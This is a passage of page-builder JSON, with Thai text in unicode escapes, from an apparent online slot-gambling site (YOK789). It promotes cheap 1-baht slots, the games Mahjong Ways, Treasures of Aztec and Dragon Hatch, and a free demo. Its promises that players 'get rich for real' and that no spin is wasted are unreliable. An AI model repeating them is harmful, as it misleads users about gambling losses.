\\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 